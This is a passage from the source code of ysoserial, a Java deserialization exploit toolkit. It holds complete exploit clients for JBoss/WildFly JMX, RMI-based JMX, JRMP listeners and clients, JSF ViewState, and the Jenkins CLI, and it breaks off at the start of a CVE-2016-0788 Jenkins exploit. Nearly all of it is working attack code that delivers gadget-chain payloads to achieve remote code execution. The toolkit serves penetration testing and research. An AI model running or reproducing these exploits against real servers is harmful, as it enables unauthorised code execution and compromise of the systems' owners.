if (suffix != null) sb.append(suffix);
first = false;
}
return sb.toString();
}
public static String repeat(String str, int num) {
final String[] strs = new String[num];
Arrays.fill(strs, str);
return join(Arrays.asList(strs), "", "", "");
}
public static List<String> formatTable(List<String[]> rows) {
final Integer[] maxLengths = new Integer[rows.get(0).length];
for (String[] row : rows) {
if (maxLengths.length != row.length) throw new IllegalStateException("mismatched columns");
for (int i = 0; i < maxLengths.length; i++) {
if (maxLengths[i] == null || maxLengths[i] < row[i].length()) {
maxLengths[i] = row[i].length();
}
}
}
final List<String> lines = new LinkedList<String>();
for (String[] row : rows) {
for (int i = 0; i < maxLengths.length; i++) {
final String pad = repeat(" ", maxLengths[i] - row[i].length());
row[i] = row[i] + pad;
}
lines.add(join(Arrays.asList(row), " ", "", ""));
}
return lines;
}
public static class ToStringComparator implements Comparator<Object> {
public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JBoss.java
================================================
package ysoserial.exploit;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.InetSocketAddress;
import java.net.MalformedURLException;
import java.net.SocketAddress;
import java.net.URI;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.Executor;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogManager;
import java.util.logging.LogRecord;
import java.util.logging.Logger;
import javax.management.InstanceNotFoundException;
import javax.management.IntrospectionException;
import javax.management.MBeanInfo;
import javax.management.MBeanOperationInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ReflectionException;
import javax.management.remote.JMXServiceURL;
import javax.security.auth.callback.Callback;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.callback.NameCallback;
import javax.security.auth.callback.PasswordCallback;
import javax.security.auth.callback.UnsupportedCallbackException;
import javax.security.sasl.RealmCallback;
import org.jboss.remoting3.Channel;
import org.jboss.remoting3.Connection;
import org.jboss.remoting3.Endpoint;
import org.jboss.remoting3.OpenListener;
import org.jboss.remoting3.Remoting;
import org.jboss.remoting3.remote.HttpUpgradeConnectionProviderFactory;
import org.jboss.remoting3.spi.ConnectionHandler;
import org.jboss.remoting3.spi.ConnectionHandlerContext;
import org.jboss.remoting3.spi.ConnectionHandlerFactory;
import org.jboss.remoting3.spi.ConnectionProvider;
import org.jboss.remoting3.spi.ConnectionProviderContext;
import org.jboss.remoting3.spi.RegisteredService;
import org.jboss.remotingjmx.VersionedConnection;
import org.xnio.FutureResult;
import org.xnio.IoFuture;
import org.xnio.IoFuture.Status;
import org.xnio.OptionMap;
import org.xnio.Options;
import org.xnio.Xnio;
import org.xnio.XnioWorker;
import org.xnio.ssl.JsseXnioSsl;
import org.xnio.ssl.XnioSsl;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;
/**
*
* An exploitation client for JBoss AS/Wildfly JMX
*
* JBoss is using a custom tunneled protocol for JMX, this is a client for this protocol.
*
* This is not as readily exploitable as in other pieces of software:
* 1. they only allow authenticated access by default
* 2. they have a very strict module architecture:
* - all MBeans exported by default use classloaders that expose almost nothing useful
* - the module classloaders do not even expose the full boot classpath, so we cannot readily use stuff like
* com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
*
* This client enumerates all application exported MBean method which are then called
* delivering the specified payload.
*
* I.e. you can succesfully exploit that
* - you have access to the interface
* (username/password can be specified via URL, note: despite not noticeable,
* local connections implicitely use authentication)
* - there is an application exported MBean
* - that application imports the classes required for the gadget chain
*
* @author mbechler
*
*/
@SuppressWarnings ( {
"rawtypes"
} )
public class JBoss {
public static void main ( String[] args ) {
if ( args.length < 3 ) {
System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
System.exit(-1);
}
URI u = URI.create(args[ 0 ]);
final Object payloadObject = Utils.makePayloadObject(args[1], args[2]);
String username = null;
String password = null;
if ( u.getUserInfo() != null ) {
int sep = u.getUserInfo().indexOf(':');
if ( sep >= 0 ) {
username = u.getUserInfo().substring(0, sep);
password = u.getUserInfo().substring(sep + 1);
}
else {
System.err.println("Need <user>:<password>@");
System.exit(-1);
}
}
doRun(u, payloadObject, username, password);
Utils.releasePayload(args[1], payloadObject);
}
private static void doRun ( URI u, final Object payloadObject, String username, String password ) {
ConnectionProvider instance = null;
ConnectionProviderContextImpl context = null;
ConnectionHandler ch = null;
Channel c = null;
VersionedConnection vc = null;
try {
Logger logger = LogManager.getLogManager().getLogger("");
logger.addHandler(new ConsoleLogHandler());
logger.setLevel(Level.INFO);
OptionMap options = OptionMap.builder().set(Options.SSL_ENABLED, u.getScheme().equals("https")).getMap();
context = new ConnectionProviderContextImpl(options, "endpoint");
instance = new HttpUpgradeConnectionProviderFactory().createInstance(context, options);
String host = u.getHost();
int port = u.getPort() > 0 ? u.getPort() : 9990;
SocketAddress destination = new InetSocketAddress(host, port);
ConnectionHandlerFactory chf = getConnection(destination, username, password, context, instance, options);
ch = chf.createInstance(new ConnectionHandlerContextImpl(context));
c = getChannel(context, ch, options);
System.err.println("Connected");
vc = makeVersionedConnection(c);
MBeanServerConnection mbc = vc.getMBeanServerConnection(null);
doExploit(payloadObject, mbc);
System.err.println("DONE");
}
catch ( Throwable e ) {
e.printStackTrace(System.err);
}
finally {
cleanup(instance, context, ch, c, vc);
}
}
private static void cleanup ( ConnectionProvider instance, ConnectionProviderContextImpl context, ConnectionHandler ch, Channel c,
VersionedConnection vc ) {
if ( vc != null ) {
vc.close();
}
if ( c != null ) {
try {
c.close();
}
catch ( IOException e ) {
e.printStackTrace(System.err);
}
}
if ( ch != null ) {
try {
ch.close();
}
catch ( IOException e ) {
e.printStackTrace(System.err);
}
}
if ( instance != null ) {
try {
instance.close();
}
catch ( IOException e ) {
e.printStackTrace(System.err);
}
}
if ( context != null ) {
context.getXnioWorker().shutdown();
}
}
private static ConnectionHandlerFactory getConnection ( SocketAddress destination, final String username, final String password,
ConnectionProviderContextImpl context, ConnectionProvider instance, OptionMap options )
throws IOException, InterruptedException, KeyManagementException, NoSuchProviderException, NoSuchAlgorithmException {
XnioSsl xnioSsl = new JsseXnioSsl(context.getXnio(), options);
FutureResult<ConnectionHandlerFactory> result = new FutureResult<ConnectionHandlerFactory>();
instance.connect(null, destination, options, result, new CallbackHandler() {
public void handle ( Callback[] callbacks ) throws IOException, UnsupportedCallbackException {
for ( Callback cb : callbacks ) {
if ( cb instanceof NameCallback ) {
( (NameCallback) cb ).setName(username);
}
else if ( cb instanceof PasswordCallback ) {
( (PasswordCallback) cb ).setPassword(password != null ? password.toCharArray() : new char[0]);
}
else if ( !( cb instanceof RealmCallback) ) {
System.err.println(cb);
throw new UnsupportedCallbackException(cb);
}
}
}
}, xnioSsl);
System.err.println("waiting for connection");
IoFuture<ConnectionHandlerFactory> ioFuture = result.getIoFuture();
Status s = ioFuture.await(5, TimeUnit.SECONDS);
if ( s == Status.FAILED ) {
System.err.println("Cannot connect");
if ( ioFuture.getException() != null ) {
ioFuture.getException().printStackTrace(System.err);
}
}
else if ( s != Status.DONE ) {
ioFuture.cancel();
System.err.println("Connect timeout");
System.exit(-1);
}
ConnectionHandlerFactory chf = ioFuture.getInterruptibly();
return chf;
}
private static Channel getChannel ( ConnectionProviderContextImpl context, ConnectionHandler ch, OptionMap options ) throws IOException {
Channel c;
FutureResult<Channel> chResult = new FutureResult<Channel>(context.getExecutor());
ch.open("jmx", chResult, options);
IoFuture<Channel> cFuture = chResult.getIoFuture();
Status s2 = cFuture.await();
if ( s2 == Status.FAILED ) {
System.err.println("Cannot connect");
if ( cFuture.getException() != null ) {
throw new IOException("Connect failed", cFuture.getException());
}
}
else if ( s2 != Status.DONE ) {
cFuture.cancel();
throw new IOException("Connect timeout");
}
c = cFuture.get();
return c;
}
private static VersionedConnection makeVersionedConnection ( Channel c )
throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, MalformedURLException {
VersionedConnection vc;
Class<?> vcf = Class.forName("org.jboss.remotingjmx.VersionedConectionFactory");
Method vcCreate = vcf.getDeclaredMethod("createVersionedConnection", Channel.class, Map.class, JMXServiceURL.class);
Reflections.setAccessible(vcCreate);
vc = (VersionedConnection) vcCreate.invoke(null, c, new HashMap(), new JMXServiceURL("service:jmx:remoting-jmx://"));
return vc;
}
private static void doExploit ( final Object payloadObject, MBeanServerConnection mbc )
throws IOException, InstanceNotFoundException, IntrospectionException, ReflectionException {
Object[] params = new Object[1];
params[ 0 ] = payloadObject;
System.err.println("Querying MBeans");
Set<ObjectInstance> testMBeans = mbc.queryMBeans(null, null);
System.err.println("Found " + testMBeans.size() + " MBeans");
for ( ObjectInstance oi : testMBeans ) {
MBeanInfo mBeanInfo = mbc.getMBeanInfo(oi.getObjectName());
for ( MBeanOperationInfo opInfo : mBeanInfo.getOperations() ) {
try {
mbc.invoke(oi.getObjectName(), opInfo.getName(), params, new String[] {});
System.err.println(oi.getObjectName() + ":" + opInfo.getName() + " -> SUCCESS");
return;
}
catch ( Throwable e ) {
String msg = e.getMessage();
if ( msg.startsWith("java.lang.ClassNotFoundException:") ) {
int start = msg.indexOf('"');
int stop = msg.indexOf('"', start + 1);
String module = ( start >= 0 && stop > 0 ) ? msg.substring(start + 1, stop) : "<unknown>";
if ( !"<unknown>".equals(module) && !"org.jboss.as.jmx:main".equals(module) ) {
int cstart = msg.indexOf(':');
int cend = msg.indexOf(' ', cstart + 2);
String cls = msg.substring(cstart + 2, cend);
System.err.println(oi.getObjectName() + ":" + opInfo.getName() + " -> FAIL CNFE " + cls + " (" + module + ")");
}
}
else {
System.err.println(oi.getObjectName() + ":" + opInfo.getName() + " -> SUCCESS|ERROR " + msg);
return;
}
}
}
}
}
private static final class ConsoleLogHandler extends Handler {
@Override
public void publish ( LogRecord record ) {
System.err.println(record.getMessage());
}
@Override
public void flush () {
}
@Override
public void close () throws SecurityException {}
}
@SuppressWarnings({"deprecation"})
private static final class ConnectionHandlerContextImpl implements ConnectionHandlerContext {
private ConnectionProviderContextImpl context;
public ConnectionHandlerContextImpl ( ConnectionProviderContextImpl context ) {
this.context = context;
}
public void remoteClosed () {}
public OpenListener getServiceOpenListener ( String serviceType ) {
return null;
}
public RegisteredService getRegisteredService ( String serviceType ) {
return null;
}
public ConnectionProviderContext getConnectionProviderContext () {
return this.context;
}
public Connection getConnection () {
return null;
}
}
private static final class ConnectionProviderContextImpl implements ConnectionProviderContext {
private XnioWorker worker;
private ExecutorService executor;
private Xnio instance;
private Endpoint endpoint;
public ConnectionProviderContextImpl ( OptionMap opts, String endpointName ) throws IllegalArgumentException, IOException {
this.instance = Xnio.getInstance();
this.worker = this.instance.createWorker(opts);
this.endpoint = Remoting.createEndpoint(endpointName, this.worker, opts);
this.executor = Executors.newCachedThreadPool(new ThreadFactory() {
public Thread newThread ( Runnable r ) {
Thread t = new Thread(r, "Worker");
t.setDaemon(true);
return t;
}
});
}
public XnioWorker getXnioWorker () {
return this.worker;
}
public Xnio getXnio () {
return this.instance;
}
public Executor getExecutor () {
return this.executor;
}
public Endpoint getEndpoint () {
return this.endpoint;
}
public void accept ( ConnectionHandlerFactory connectionHandlerFactory ) {
System.err.println("accept");
}
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JMXInvokeMBean.java
================================================
package ysoserial.exploit;
import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;
import ysoserial.payloads.ObjectPayload.Utils;
/*
* Utility program for exploiting RMI based JMX services running with required gadgets available in their ClassLoader.
* Attempts to exploit the service by invoking a method on a exposed MBean, passing the payload as argument.
*
*/
public class JMXInvokeMBean {
public static void main(String[] args) throws Exception {
if ( args.length < 4 ) {
System.err.println(JMXInvokeMBean.class.getName() + " <host> <port> <payload_type> <payload_arg>");
System.exit(-1);
}
JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args[0] + ":" + args[1] + "/jmxrmi");
JMXConnector jmxConnector = JMXConnectorFactory.connect(url);
MBeanServerConnection mbeanServerConnection = jmxConnector.getMBeanServerConnection();
// create the payload
Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
ObjectName mbeanName = new ObjectName("java.util.logging:type=Logging");
mbeanServerConnection.invoke(mbeanName, "getLoggerLevel", new Object[]{payloadObject}, new String[]{String.class.getCanonicalName()});
//close the connection
jmxConnector.close();
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JRMPClassLoadingListener.java
================================================
package ysoserial.exploit;
import java.net.URL;
/**
* JRMP listener triggering RMI remote classloading
*
* Opens up an JRMP listener that will deliver a remote classpath class to the calling client.
*
* Mostly CVE-2013-1537 (presumably, does not state details) with the difference that you don't need
* access to an RMI socket when you can deliver {@link ysoserial.payloads.JRMPClient}.
*
* This only works if
* - the remote end is running with a security manager
* - java.rmi.server.useCodebaseOnly=false (default until 7u21)
* - the remote has the proper permissions to remotely load the class (mostly URLPermission)
*
* and, of course, the payload class is then run under the security manager with a remote codebase
* so either the policy needs to allow whatever you want to do in the payload or you need to combine
* with a security manager bypass exploit (wouldn't be the first time).
*
* @author mbechler
*
*/
public class JRMPClassLoadingListener {
public static final void main ( final String[] args ) {
if ( args.length < 3 ) {
System.err.println(JRMPClassLoadingListener.class.getName() + " <port> <url> <className>");
System.exit(-1);
return;
}
try {
int port = Integer.parseInt(args[ 0 ]);
System.err.println("* Opening JRMP listener on " + port);
JRMPListener c = new JRMPListener(port, args[2], new URL(args[1]));
c.run();
}
catch ( Exception e ) {
System.err.println("Listener error");
e.printStackTrace(System.err);
}
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JRMPClient.java
================================================
package ysoserial.exploit;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.UnknownHostException;
import javax.net.SocketFactory;
import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.ObjectPayload.Utils;
/**
* Generic JRMP client
*
* Pretty much the same thing as {@link RMIRegistryExploit} but
* - targeting the remote DGC (Distributed Garbage Collection, always there if there is a listener)
* - not deserializing anything (so you don't get yourself exploited ;))
*
* @author mbechler
*
*/
@SuppressWarnings ( {
"restriction"
} )
public class JRMPClient {
public static final void main ( final String[] args ) {
if ( args.length < 4 ) {
System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
System.exit(-1);
}
Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
String hostname = args[ 0 ];
int port = Integer.parseInt(args[ 1 ]);
try {
System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
makeDGCCall(hostname, port, payloadObject);
}
catch ( Exception e ) {
e.printStackTrace(System.err);
}
Utils.releasePayload(args[2], payloadObject);
}
public static void makeDGCCall ( String hostname, int port, Object payloadObject ) throws IOException, UnknownHostException, SocketException {
InetSocketAddress isa = new InetSocketAddress(hostname, port);
Socket s = null;
DataOutputStream dos = null;
try {
s = SocketFactory.getDefault().createSocket(hostname, port);
s.setKeepAlive(true);
s.setTcpNoDelay(true);
OutputStream os = s.getOutputStream();
dos = new DataOutputStream(os);
dos.writeInt(TransportConstants.Magic);
dos.writeShort(TransportConstants.Version);
dos.writeByte(TransportConstants.SingleOpProtocol);
dos.write(TransportConstants.Call);
@SuppressWarnings ( "resource" )
final ObjectOutputStream objOut = new MarshalOutputStream(dos);
objOut.writeLong(2); // DGC
objOut.writeInt(0);
objOut.writeLong(0);
objOut.writeShort(0);
objOut.writeInt(1); // dirty
objOut.writeLong(-669196253586618813L);
objOut.writeObject(payloadObject);
os.flush();
}
finally {
if ( dos != null ) {
dos.close();
}
if ( s != null ) {
s.close();
}
}
}
static final class MarshalOutputStream extends ObjectOutputStream {
private URL sendUrl;
public MarshalOutputStream (OutputStream out, URL u) throws IOException {
super(out);
this.sendUrl = u;
}
MarshalOutputStream ( OutputStream out ) throws IOException {
super(out);
}
@Override
protected void annotateClass ( Class<?> cl ) throws IOException {
if ( this.sendUrl != null ) {
writeObject(this.sendUrl.toString());
} else if ( ! ( cl.getClassLoader() instanceof URLClassLoader ) ) {
writeObject(null);
}
else {
URL[] us = ( (URLClassLoader) cl.getClassLoader() ).getURLs();
String cb = "";
for ( URL u : us ) {
cb += u.toString();
}
writeObject(cb);
}
}
/**
* Serializes a location from which to load the specified class.
*/
@Override
protected void annotateProxyClass ( Class<?> cl ) throws IOException {
annotateClass(cl);
}
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JRMPListener.java
================================================
package ysoserial.exploit;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.Arrays;
import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;
/**
* Generic JRMP listener
*
* Opens up an JRMP listener that will deliver the specified payload to any
* client connecting to it and making a call.
*
* @author mbechler
*
*/
@SuppressWarnings ( {
"restriction"
} )
public class JRMPListener implements Runnable {
private int port;
private Object payloadObject;
private ServerSocket ss;
private Object waitLock = new Object();
private boolean exit;
private boolean hadConnection;
private URL classpathUrl;
public JRMPListener ( int port, Object payloadObject ) throws NumberFormatException, IOException {
this.port = port;
this.payloadObject = payloadObject;
this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
}
public JRMPListener (int port, String className, URL classpathUrl) throws IOException {
this.port = port;
this.payloadObject = makeDummyObject(className);
this.classpathUrl = classpathUrl;
this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
}
public boolean waitFor ( int i ) {
try {
if ( this.hadConnection ) {
return true;
}
System.err.println("Waiting for connection");
synchronized ( this.waitLock ) {
this.waitLock.wait(i);
}
return this.hadConnection;
}
catch ( InterruptedException e ) {
return false;
}
}
/**
*
*/
public void close () {
this.exit = true;
try {
this.ss.close();
}
catch ( IOException e ) {}
synchronized ( this.waitLock ) {
this.waitLock.notify();
}
}
public static final void main ( final String[] args ) {
if ( args.length < 3 ) {
System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
System.exit(-1);
return;
}
final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);
try {
int port = Integer.parseInt(args[ 0 ]);
System.err.println("* Opening JRMP listener on " + port);
JRMPListener c = new JRMPListener(port, payloadObject);
c.run();
}
catch ( Exception e ) {
System.err.println("Listener error");
e.printStackTrace(System.err);
}
Utils.releasePayload(args[1], payloadObject);
}
public void run () {
try {
Socket s = null;
try {
while ( !this.exit && ( s = this.ss.accept() ) != null ) {
try {
s.setSoTimeout(5000);
InetSocketAddress remote = (InetSocketAddress) s.getRemoteSocketAddress();
System.err.println("Have connection from " + remote);
InputStream is = s.getInputStream();
InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is);
// Read magic (or HTTP wrapper)
bufIn.mark(4);
DataInputStream in = new DataInputStream(bufIn);
int magic = in.readInt();
short version = in.readShort();
if ( magic != TransportConstants.Magic || version != TransportConstants.Version ) {
s.close();
continue;
}
OutputStream sockOut = s.getOutputStream();
BufferedOutputStream bufOut = new BufferedOutputStream(sockOut);
DataOutputStream out = new DataOutputStream(bufOut);
byte protocol = in.readByte();
switch ( protocol ) {
case TransportConstants.StreamProtocol:
out.writeByte(TransportConstants.ProtocolAck);
if ( remote.getHostName() != null ) {
out.writeUTF(remote.getHostName());
} else {
out.writeUTF(remote.getAddress().toString());
}
out.writeInt(remote.getPort());
out.flush();
in.readUTF();
in.readInt();
case TransportConstants.SingleOpProtocol:
doMessage(s, in, out, this.payloadObject);
break;
default:
case TransportConstants.MultiplexProtocol:
System.err.println("Unsupported protocol");
s.close();
continue;
}
bufOut.flush();
out.flush();
}
catch ( InterruptedException e ) {
return;
}
catch ( Exception e ) {
e.printStackTrace(System.err);
}
finally {
System.err.println("Closing connection");
s.close();
}
}
}
finally {
if ( s != null ) {
s.close();
}
if ( this.ss != null ) {
this.ss.close();
}
}
}
catch ( SocketException e ) {
return;
}
catch ( Exception e ) {
e.printStackTrace(System.err);
}
}
private void doMessage ( Socket s, DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
System.err.println("Reading message...");
int op = in.read();
switch ( op ) {
case TransportConstants.Call:
// service incoming RMI call
doCall(in, out, payload);
break;
case TransportConstants.Ping:
// send ack for ping
out.writeByte(TransportConstants.PingAck);
break;
case TransportConstants.DGCAck:
UID u = UID.read(in);
break;
default:
throw new IOException("unknown transport op " + op);
}
s.close();
}
private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
ObjectInputStream ois = new ObjectInputStream(in) {
@Override
protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
return ObjID[].class;
} else if ("java.rmi.server.ObjID".equals(desc.getName())) {
return ObjID.class;
} else if ( "java.rmi.server.UID".equals(desc.getName())) {
return UID.class;
}
throw new IOException("Not allowed to read object");
}
};
ObjID read;
try {
read = ObjID.read(ois);
}
catch ( java.io.IOException e ) {
throw new MarshalException("unable to read objID", e);
}
if ( read.hashCode() == 2 ) {
ois.readInt(); // method
ois.readLong(); // hash
System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
}
System.err.println("Sending return with payload for obj " + read);
out.writeByte(TransportConstants.Return);// transport op
ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);
oos.writeByte(TransportConstants.ExceptionalReturn);
new UID().write(oos);
BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
Reflections.setFieldValue(ex, "val", payload);
oos.writeObject(ex);
oos.flush();
out.flush();
this.hadConnection = true;
synchronized ( this.waitLock ) {
this.waitLock.notifyAll();
}
}
@SuppressWarnings({"deprecation"})
protected static Object makeDummyObject (String className) {
try {
ClassLoader isolation = new ClassLoader() {};
ClassPool cp = new ClassPool();
cp.insertClassPath(new ClassClassPath(Dummy.class));
CtClass clazz = cp.get(Dummy.class.getName());
clazz.setName(className);
return clazz.toClass(isolation).newInstance();
}
catch ( Exception e ) {
e.printStackTrace();
return new byte[0];
}
}
public static class Dummy implements Serializable {
private static final long serialVersionUID = 1L;
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JSF.java
================================================
package ysoserial.exploit;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import org.apache.commons.codec.binary.Base64;
import ysoserial.payloads.ObjectPayload.Utils;
/**
* JSF view state exploit
*
* Delivers a gadget payload via JSF ViewState token.
*
* This will only work if ViewState encryption/mac is disabled.
*
* While it has been long known that client side state saving
* with encryption disabled leads to RCE via EL injection,
* this of course also works with deserialization gadgets.
*
* Also, it turns out that MyFaces is vulnerable to this even when
* using server-side state saving
* (yes, please, let's (de-)serialize a String as an Object).
*
* @author mbechler
*
*/
public class JSF {
public static void main ( String[] args ) {
if ( args.length < 3 ) {
System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
System.exit(-1);
}
final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);
try {
URL u = new URL(args[ 0 ]);
URLConnection c = u.openConnection();
if ( ! ( c instanceof HttpURLConnection ) ) {
throw new IllegalArgumentException("Not a HTTP url");
}
HttpURLConnection hc = (HttpURLConnection) c;
hc.setDoOutput(true);
hc.setRequestMethod("POST");
hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
OutputStream os = hc.getOutputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(payloadObject);
oos.close();
byte[] data = bos.toByteArray();
String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
os.write(requestBody.getBytes("US-ASCII"));
os.close();
System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
}
catch ( Exception e ) {
e.printStackTrace(System.err);
}
Utils.releasePayload(args[1], payloadObject);
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JenkinsCLI.java
================================================
package ysoserial.exploit;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.net.URLConnection;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;
import javax.net.SocketFactory;
import hudson.remoting.Callable;
import hudson.remoting.Channel;
import hudson.remoting.Channel.Mode;
import hudson.remoting.ChannelBuilder;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;
/**
* Jenkins CLI client
*
* Jenkins unfortunately is still using a custom serialization based
* protocol for remote communications only protected by a blacklisting
* application level filter.
*
* This is a generic client delivering a gadget chain payload via that protocol.
*
* @author mbechler
*
*/
public class JenkinsCLI {
public static final void main ( final String[] args ) {
if ( args.length < 3 ) {
System.err.println(JenkinsCLI.class.getName() + " <jenkins_url> <payload_type> <payload_arg>");
System.exit(-1);
}
final Object payloadObject = Utils.makePayloadObject(args[1], args[2]);
String jenkinsUrl = args[ 0 ];
Channel c = null;
try {
InetSocketAddress isa = JenkinsCLI.getCliPort(jenkinsUrl);
c = JenkinsCLI.openChannel(isa);
c.call(getPropertyCallable(payloadObject));
}
catch ( Throwable e ) {
e.printStackTrace();
}
finally {
if ( c != null ) {
try {
c.close();
}
catch ( IOException e ) {
e.printStackTrace(System.err);
}
}
}
Utils.releasePayload(args[1], payloadObject);
}
public static Callable<?, ?> getPropertyCallable ( final Object prop )
throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
Class<?> reqClass = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest");
Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
Reflections.setAccessible(reqCons);
Object getJarLoader = reqCons
.newInstance(1, Class.forName("hudson.remoting.IChannel").getMethod("getProperty", Object.class), new Object[] {
prop
});
return (Callable<?, ?>) getJarLoader;
}
public static InetSocketAddress getCliPort ( String jenkinsUrl ) throws MalformedURLException, IOException {
URL u = new URL(jenkinsUrl);
URLConnection conn = u.openConnection();
if ( ! ( conn instanceof HttpURLConnection ) ) {
System.err.println("Not a HTTP URL");
throw new MalformedURLException();
}
HttpURLConnection hc = (HttpURLConnection) conn;
if ( hc.getResponseCode() >= 400 ) {
System.err.println("* Error connection to jenkins HTTP " + u);
}
int clip = Integer.parseInt(hc.getHeaderField("X-Jenkins-CLI-Port"));
return new InetSocketAddress(u.getHost(), clip);
}
public static Channel openChannel ( InetSocketAddress isa ) throws IOException, SocketException {
System.err.println("* Opening socket " + isa);
Socket s = SocketFactory.getDefault().createSocket(isa.getAddress(), isa.getPort());
s.setKeepAlive(true);
s.setTcpNoDelay(true);
System.err.println("* Opening channel");
OutputStream outputStream = s.getOutputStream();
DataOutputStream dos = new DataOutputStream(outputStream);
dos.writeUTF("Protocol:CLI-connect");
ExecutorService cp = Executors.newCachedThreadPool(new ThreadFactory() {
public Thread newThread ( Runnable r ) {
Thread t = new Thread(r, "Channel");
t.setDaemon(true);
return t;
}
});
Channel c = new ChannelBuilder("EXPLOIT", cp).withMode(Mode.BINARY).build(s.getInputStream(), outputStream);
System.err.println("* Channel open");
return c;
}
}
================================================
FILE: src/main/java/ysoserial/exploit/JenkinsListener.java
================================================
package ysoserial.exploit;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.rmi.activation.ActivationDesc;
import java.rmi.activation.ActivationID;
import java.rmi.activation.ActivationInstantiator;
import javax.net.SocketFactory;
import hudson.remoting.Callable;
import hudson.remoting.Channel;
import hudson.remoting.JarLoader;
import sun.rmi.server.Util;
import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.JRMPListener;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;
/**
* CVE-2016-0788 exploit (1)
*
* 1. delivers a ysoserial.payloads.JRMPListener payload to jenkins via it's remoting protocol.
* 2. that payload causes the remote server to open up an JRMP listener (and export an object).
* 3. connect to that JRMP listener and deliver any otherwise blacklisted payload.
*
* Extra twist:
* The well-known objects exported by the listener use the system classloader which usually
* won't contain the targeted classes. Therefor we need to get ahold of the exported object's id
